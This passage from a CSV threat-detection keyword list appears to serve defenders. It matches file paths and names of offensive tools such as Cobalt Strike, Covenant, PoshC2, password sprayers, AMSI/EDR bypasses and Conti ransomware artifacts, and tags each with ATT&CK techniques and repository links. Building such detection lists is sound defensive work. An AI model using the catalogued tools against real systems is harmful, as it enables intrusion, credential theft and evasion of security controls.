tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/opt/.exegol_aliases*",".{0,1000}\/opt\/\.exegol_aliases.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/opt/chimera*",".{0,1000}\/opt\/chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/opt/cobaltstrike/*",".{0,1000}\/opt\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/opt/cobaltstrike/logs*",".{0,1000}\/opt\/cobaltstrike\/logs.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/opt/cobaltstrike-nemesis*",".{0,1000}\/opt\/cobaltstrike\-nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/opt/Covenant/Covenant/*",".{0,1000}\/opt\/Covenant\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/opt/dnscrypt-proxy*",".{0,1000}\/opt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*/opt/gocrack/files/engine*",".{0,1000}\/opt\/gocrack\/files\/engine.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/opt/gocrack/files/task*",".{0,1000}\/opt\/gocrack\/files\/task.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/opt/icebreaker*",".{0,1000}\/opt\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/opt/implant/*",".{0,1000}\/opt\/implant\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/opt/lwp-scripts*",".{0,1000}\/opt\/lwp\-scripts.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/opt/lwp-wordlists*",".{0,1000}\/opt\/lwp\-wordlists.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/opt/merlin/*",".{0,1000}\/opt\/merlin\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/opt/nessus/*",".{0,1000}\/opt\/nessus\/.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/opt/Ninja/*",".{0,1000}\/opt\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/opt/Password_Cracking/*",".{0,1000}\/opt\/Password_Cracking\/.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/opt/PoshC2*",".{0,1000}\/opt\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/opt/Projects/AmsiBypass/*",".{0,1000}\/opt\/Projects\/AmsiBypass\/.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*/opt/rai/*",".{0,1000}\/opt\/rai\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/opt/seclists/Discovery/*",".{0,1000}\/opt\/seclists\/Discovery\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/optiv/Dent/*",".{0,1000}\/optiv\/Dent\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/optiv/Freeze/*",".{0,1000}\/optiv\/Freeze\/.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*/oracle-brute.nse*",".{0,1000}\/oracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-brute-stealth.nse*",".{0,1000}\/oracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-enum-users.nse*",".{0,1000}\/oracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-patator.py*",".{0,1000}\/oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/oracle-scanner.py*",".{0,1000}\/oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/oracle-sid-brute.nse*",".{0,1000}\/oracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-tnscmd.py*",".{0,1000}\/oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/oracle-tns-version.nse*",".{0,1000}\/oracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/orbitaldump.git*",".{0,1000}\/orbitaldump\.git.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*/oscp.profile*",".{0,1000}\/oscp\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*/OSEP-Code-Snippets.git*",".{0,1000}\/OSEP\-Code\-Snippets\.git.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/osmedeus*",".{0,1000}\/osmedeus.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/oSpray.py*",".{0,1000}\/oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" "*/OUned.git*",".{0,1000}\/OUned\.git.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/ouned_smbserver.py*",".{0,1000}\/ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/out:revsocks.exe*",".{0,1000}\/out\:revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*/out:spacerunner.exe*",".{0,1000}\/out\:spacerunner\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/outfile:C:\ProgramData\hashes.txt*",".{0,1000}\/outfile\:C\:\\ProgramData\\hashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/outflank_bofs/*",".{0,1000}\/outflank_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/outflanknl/*",".{0,1000}\/outflanknl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*/Out-Minidump.ps1*",".{0,1000}\/Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/output/payloads/*",".{0,1000}\/output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/output/ratchatPT*",".{0,1000}\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ovs-agent-version.nse*",".{0,1000}\/ovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/OWASP*",".{0,1000}\/OWASP.{0,1000}","offensive_tool_keyword","OWASP","resources and cheat sheet for web attacks techniques","T1190 - T1191 - T1192 - T1210 - T1590 - T1558","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Web Attacks","https://github.com/OWASP","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/owa-valid-users.txt*",".{0,1000}\/owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/p_cve-2014-9322.tar.gz*",".{0,1000}\/p_cve\-2014\-9322\.tar\.gz.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/p292/Phant0m*",".{0,1000}\/p292\/Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 